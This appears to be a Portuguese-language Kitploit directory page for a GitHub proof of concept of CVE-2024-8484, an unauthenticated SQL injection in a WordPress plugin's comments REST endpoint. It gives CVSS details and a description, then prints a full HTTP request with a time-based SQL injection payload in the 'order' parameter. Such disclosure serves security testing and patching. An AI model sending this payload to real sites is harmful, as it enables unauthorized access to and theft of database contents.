Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-8484 — REST API TO MiniProgram <= 4.7.1 - Injeção SQL Não Autenticada | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-8484
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubrandomrobbiebf/cve-2024-8484

CVE-2024-8484

REST API TO MiniProgram <= 4.7.1 - Injeção SQL Não Autenticada

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-8484

REST API TO MiniProgram <= 4.7.1 - Injeção SQL não autenticada

root@kitploit:~
CVE: CVE-2024-8484
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS Score: 7.5
Slugs: rest-api-to-miniprogram

Descrição:

O plugin REST API TO MiniProgram para WordPress é vulnerável a Injeção de SQL (SQL Injection) através do parâmetro 'order' do endpoint da REST API /wp-json/watch-life-net/v1/comment/getcomments em todas as versões até, e incluindo, a 4.7.1, devido a escape insuficiente no parâmetro fornecido pelo usuário e à falta de preparação suficiente na consulta SQL existente. Isso possibilita que atacantes não autenticados acrescentem consultas SQL adicionais às consultas já existentes, que podem ser usadas para extrair informações sensíveis do banco de dados.

Prova de Conceito

root@kitploit:~
GET /wp-json/watch-life-net/v1/comment/getcomments?order=DESC,(SELECT(1)FROM(SELECT(SLEEP(10)))a)--&postid=3&limit=1&page=1&page=1 HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/post-new.php?post_type=page
Connection: keep-alive
If-Modified-Since: Mon, 16 Sep 2024 18:56:28 GMT
If-None-Match: "5a3-62241215fdfaa-gzip"
Priority: u=2

alt text

Baixar ferramenta